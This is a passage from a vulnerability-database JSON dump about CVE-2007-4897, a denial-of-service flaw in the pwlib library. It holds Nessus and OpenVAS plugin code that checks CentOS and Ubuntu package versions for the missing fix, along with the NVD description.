to support cross-platform applications.\n\nIn Red Hat Enterprise Linux 5, the Ekiga teleconferencing application\nuses PWLib.\n\nA memory management flaw was discovered in PWLib. An attacker could\nuse this flaw to crash an application, such as Ekiga, which is linked\nwith pwlib (CVE-2007-4897).\n\nUsers should upgrade to these updated packages which contain a\nbackported patch to correct this issue.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2007-October/014288.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?71b317cd\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2007-October/014289.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fb2bbfa3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pwlib packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pwlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pwlib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2015 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"pwlib-1.10.1-7.0.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pwlib-devel-1.10.1-7.0.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "CentOS 5 : pwlib (CESA-2007:0932)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:45:58"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:centos:centos:pwlib-devel", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:pwlib"], "cvelist": ["CVE-2007-4897"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "description": "Updated pwlib packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPWLib is a library used to support cross-platform applications.\n\nIn Red Hat Enterprise Linux 5, the Ekiga teleconferencing application\nuses PWLib.\n\nA memory management flaw was discovered in PWLib. An attacker could\nuse this flaw to crash an application, such as Ekiga, which is linked\nwith pwlib (CVE-2007-4897).\n\nUsers should upgrade to these updated packages which contain a\nbackported patch to correct this issue.", "edition": 10, "enchantments": {"dependencies": {"modified": "2019-10-28T20:00:18", "references": [{"idList": ["CVE-2007-4897"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310830218", "OPENVAS:840204", "OPENVAS:830218"], "type": "openvas"}, {"idList": ["CESA-2007:0932"], "type": "centos"}, {"idList": ["DEBIAN:B539EAF12FF57A243523C118FB3AAA47:81EF2"], "type": "debian"}, {"idList": ["SSV:12761", "SSV:66737"], "type": "seebug"}, {"idList": ["EDB-ID:9241"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:79578"], "type": "packetstorm"}, {"idList": ["USN-561-1"], "type": "ubuntu"}, {"idList": ["RHSA-2007:0932"], "type": "redhat"}, {"idList": ["REDHAT-RHSA-2007-0932.NASL", "MANDRAKE_MDKSA-2007-206.NASL", "SL_20071008_PWLIB_ON_SL5_X.NASL", "UBUNTU_USN-561-1.NASL"], "type": "nessus"}]}, "score": {"modified": "2019-10-28T20:00:18", "value": 5.3, "vector": "NONE"}}, "hash": "9e79f4230c763ad4fe0700a1c7068772f806c2fbaf0110f8a7bdbf7c72fbef75", "hashmap": [{"hash": "670e726e9e89bca9234a526af9acdf15", "key": "href"}, {"hash": "139fdc6a55a267911418f3725827f166", "key": "references"}, {"hash": "9acbbf70329fce6cdd6aee6da1a659d3", "key": "sourceData"}, {"hash": "9b0e46dace93367b7e91f251d817f95a", "key": "reporter"}, {"hash": "8f8213e8b86855939d5beea715ce3045", "key": "naslFamily"}, {"hash": "d9bfa7ad7523d83863b53108629afb62", "key": "description"}, {"hash": "98bb263b4c43031df9d6914eeb9842bf", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "41b62a8aa1ee5c40897717cadc30784a", "key": "cvss"}, {"hash": "95ee216e5a483732554f971b1708ad99", "key": "pluginID"}, {"hash": "fd5b0ac2be0f5feddb6b303186cd9f6f", "key": "published"}, {"hash": "5d654a44711975a6bf29c35562fc6019", "key": "cpe"}, {"hash": "23ce845004d25b65f635b88c2da58bea", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/43653", "id": "CENTOS_RHSA-2007-0932.NASL", "lastseen": "2019-10-28T20:00:18", "modified": "2019-10-02T00:00:00", "naslFamily": "CentOS Local Security Checks", "objectVersion": "1.3", "pluginID": "43653", "published": "2010-01-06T00:00:00", "references": ["http://www.nessus.org/u?137296a2", "http://www.nessus.org/u?4ea60df5"], "reporter": "This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0932 and \n# CentOS Errata and Security Advisory 2007:0932 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43653);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/10/25 13:36:03\");\n\n script_cve_id(\"CVE-2007-4897\");\n script_xref(name:\"RHSA\", value:\"2007:0932\");\n\n script_name(english:\"CentOS 5 : pwlib (CESA-2007:0932)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pwlib packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPWLib is a library used to support cross-platform applications.\n\nIn Red Hat Enterprise Linux 5, the Ekiga teleconferencing application\nuses PWLib.\n\nA memory management flaw was discovered in PWLib. An attacker could\nuse this flaw to crash an application, such as Ekiga, which is linked\nwith pwlib (CVE-2007-4897).\n\nUsers should upgrade to these updated packages which contain a\nbackported patch to correct this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-October/014288.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4ea60df5\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-October/014289.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?137296a2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pwlib packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pwlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pwlib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"pwlib-1.10.1-7.0.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pwlib-devel-1.10.1-7.0.1.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"pwlib / pwlib-devel\");\n}\n", "title": "CentOS 5 : pwlib (CESA-2007:0932)", "type": "nessus", "viewCount": 6}, "differentElements": ["modified"], "edition": 10, "lastseen": "2019-10-28T20:00:18"}], "edition": 11, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "5d654a44711975a6bf29c35562fc6019"}, {"key": "cvelist", "hash": "98bb263b4c43031df9d6914eeb9842bf"}, {"key": "cvss", "hash": "41b62a8aa1ee5c40897717cadc30784a"}, {"key": "description", "hash": "d9bfa7ad7523d83863b53108629afb62"}, {"key": "href", "hash": "670e726e9e89bca9234a526af9acdf15"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "8f8213e8b86855939d5beea715ce3045"}, {"key": "pluginID", "hash": "95ee216e5a483732554f971b1708ad99"}, {"key": "published", "hash": "fd5b0ac2be0f5feddb6b303186cd9f6f"}, {"key": "references", "hash": "139fdc6a55a267911418f3725827f166"}, {"key": "reporter", "hash": "9b0e46dace93367b7e91f251d817f95a"}, {"key": "sourceData", "hash": "9acbbf70329fce6cdd6aee6da1a659d3"}, {"key": "title", "hash": "23ce845004d25b65f635b88c2da58bea"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "03bfcc6596d3abd8ec994ef0c9c0c42364f145f5d0798fd602635beef1df44df", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4897"]}, {"type": "openvas", "idList": ["OPENVAS:840204", "OPENVAS:1361412562310830218", "OPENVAS:830218"]}, {"type": "seebug", "idList": ["SSV:12761", "SSV:66737"]}, {"type": "ubuntu", "idList": ["USN-561-1"]}, {"type": "nessus", "idList": ["UBUNTU_USN-561-1.NASL", "REDHAT-RHSA-2007-0932.NASL", "SL_20071008_PWLIB_ON_SL5_X.NASL", "MANDRAKE_MDKSA-2007-206.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:9241"]}, {"type": "centos", "idList": ["CESA-2007:0932"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:79578"]}, {"type": "debian", "idList": ["DEBIAN:B539EAF12FF57A243523C118FB3AAA47:81EF2"]}, {"type": "redhat", "idList": ["RHSA-2007:0932"]}], "modified": "2019-11-01T02:15:06"}, "score": {"value": 5.3, "vector": "NONE", "modified": "2019-11-01T02:15:06"}, "vulnersScore": 5.3}, "objectVersion": "1.3", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0932 and \n# CentOS Errata and Security Advisory 2007:0932 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43653);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/10/25 13:36:03\");\n\n script_cve_id(\"CVE-2007-4897\");\n script_xref(name:\"RHSA\", value:\"2007:0932\");\n\n script_name(english:\"CentOS 5 : pwlib (CESA-2007:0932)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pwlib packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPWLib is a library used to support cross-platform applications.\n\nIn Red Hat Enterprise Linux 5, the Ekiga teleconferencing application\nuses PWLib.\n\nA memory management flaw was discovered in PWLib. An attacker could\nuse this flaw to crash an application, such as Ekiga, which is linked\nwith pwlib (CVE-2007-4897).\n\nUsers should upgrade to these updated packages which contain a\nbackported patch to correct this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-October/014288.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4ea60df5\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-October/014289.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?137296a2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pwlib packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pwlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pwlib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"pwlib-1.10.1-7.0.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pwlib-devel-1.10.1-7.0.1.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"pwlib / pwlib-devel\");\n}\n", "naslFamily": "CentOS Local Security Checks", "pluginID": "43653", "cpe": ["p-cpe:/a:centos:centos:pwlib-devel", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:pwlib"], "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:09:01", "bulletinFamily": "NVD", "description": "pwlib, as used by Ekiga 2.0.5 and possibly other products, allows remote attackers to cause a denial of service (application crash) via a long argument to the PString::vsprintf function, related to a \"memory management flaw\". NOTE: this issue was originally reported as being in the SIPURL::GetHostAddress function in Ekiga (formerly GnomeMeeting).", "modified": "2018-10-15T21:38:00", "id": "CVE-2007-4897", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4897", "published": "2007-09-14T18:17:00", "title": "CVE-2007-4897", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2017-12-04T11:28:16", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-561-1", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840204", "id": "OPENVAS:840204", "title": "Ubuntu Update for pwlib vulnerability USN-561-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_561_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for pwlib vulnerability USN-561-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Jose Miguel Esparza discovered that pwlib did not correctly handle large\n string lengths. A remote attacker could send specially crafted packets to\n applications linked against pwlib (e.g. Ekiga) causing them to crash, leading\n to a denial of service.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-561-1\";\ntag_affected = \"pwlib vulnerability on Ubuntu 6.06 LTS ,\n Ubuntu 6.10 ,\n Ubuntu 7.04 ,\n Ubuntu 7.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-561-1/\");\n script_id(840204);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"USN\", value: \"561-1\");\n script_cve_id(\"CVE-2007-4897\");\n script_name( \"Ubuntu Update for pwlib vulnerability USN-561-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU7.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libpt\", ver:\"1.10.0_1.10.3-0ubuntu1.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-dbg\", ver:\"1.10.3-0ubuntu1.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-dev\", ver:\"1.10.3-0ubuntu1.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-alsa\", ver:\"1.10.3-0ubuntu1.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-v4l2\", ver:\"1.10.3-0ubuntu1.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-v4l\", ver:\"1.10.3-0ubuntu1.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-avc\", ver:\"1.10.3-0ubuntu1.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-dc\", ver:\"1.10.3-0ubuntu1.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-oss\", ver:\"1.10.3-0ubuntu1.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-doc\", ver:\"1.10.3-0ubuntu1.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libpt\", ver:\"1.10.0_1.10.0-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-dbg\", ver:\"1.10.0-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-dev\", ver:\"1.10.0-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-alsa\", ver:\"1.10.0-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-v4l2\", ver:\"1.10.0-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-v4l\", ver:\"1.10.0-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-avc\", ver:\"1.10.0-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-dc\", ver:\"1.10.0-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-oss\", ver:\"1.10.0-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-doc\", ver:\"1.10.0-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libpt\", ver:\"1.10.0_1.10.2.dfsg-0ubuntu3.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-dbg\", ver:\"1.10.2.dfsg-0ubuntu3.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-dev\", ver:\"1.10.2.dfsg-0ubuntu3.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-alsa\", ver:\"1.10.2.dfsg-0ubuntu3.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-v4l2\", ver:\"1.10.2.dfsg-0ubuntu3.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-v4l\", ver:\"1.10.2.dfsg-0ubuntu3.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-avc\", ver:\"1.10.2.dfsg-0ubuntu3.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-dc\", ver:\"1.10.2.dfsg-0ubuntu3.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-plugins-oss\", ver:\"1.10.2.dfsg-0ubuntu3.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-doc\", ver:\"1.10.2.dfsg-0ubuntu3.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU7.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libpt\", ver:\"1.10.0_1.10.10-0ubuntu2.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-dbg\", ver:\"1.10.10-0ubuntu2.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpt-dev\", ver:\"1.10.10-0ubuntu2.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 